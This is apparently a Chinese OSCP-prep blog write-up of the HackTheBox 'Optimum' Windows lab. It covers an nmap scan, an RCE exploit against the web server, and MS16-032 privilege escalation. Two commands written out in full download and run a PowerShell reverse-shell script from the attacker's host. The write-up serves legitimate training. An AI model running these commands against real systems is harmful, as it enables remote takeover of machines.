OSCP备考_0x39_HackThBox靶机_Windows_Optimum

Ethan医生2周前靶场23


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.155 (扫描TCP)

image.png


image.png

查看到版本是2.3,有rce

image.png



python3 49125.py 10.129.254.155 80  "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"


image.png

开始操作提权

查询漏洞

https://github.com/rayhan0x01/reverse-shell-able-exploit-pocs/blob/master/ms16-032.md 发现有MS16032漏洞

尝试上传挡案

image.png

下载后执行. 

Invoke-MS16032 -Command "iex(New-Object Net.WebClient).DownloadString('http://10.10.16.43:8000/Invoke-PowerShellTcp.ps1')"

image.png

直接执行./Invoke-MS16032.ps1 直接拿下

image.png






标签: OSCP

相关文章

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

OSCP备考_0x49_HackThBox靶机_Windows_Bankrobber

Bankrobbernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.109 (扫描TCP)80存在apache,所以我们要关注p...

OSCP备考_0x33_HackThBox靶机_luanne

OSCP备考_0x33_HackThBox靶机_luanne

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.167.171 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

OSCP备考_0x15_Vulnhub靶机_DerpNStink: 1

名称说明靶机下载链接https://www.vulnhub.com/entry/derpnstink-1,221/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192...

OSCP备考_0x32_HackThBox靶机_Passage

OSCP备考_0x32_HackThBox靶机_Passage

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.221.74 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x34_HackThBox靶机_time

OSCP备考_0x34_HackThBox靶机_time

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.107.34 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

OSCP备考_0x16_Vulnhub靶机_Matrix: 3

名称说明靶机下载链接https://www.vulnhub.com/entry/matrix-3,326/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。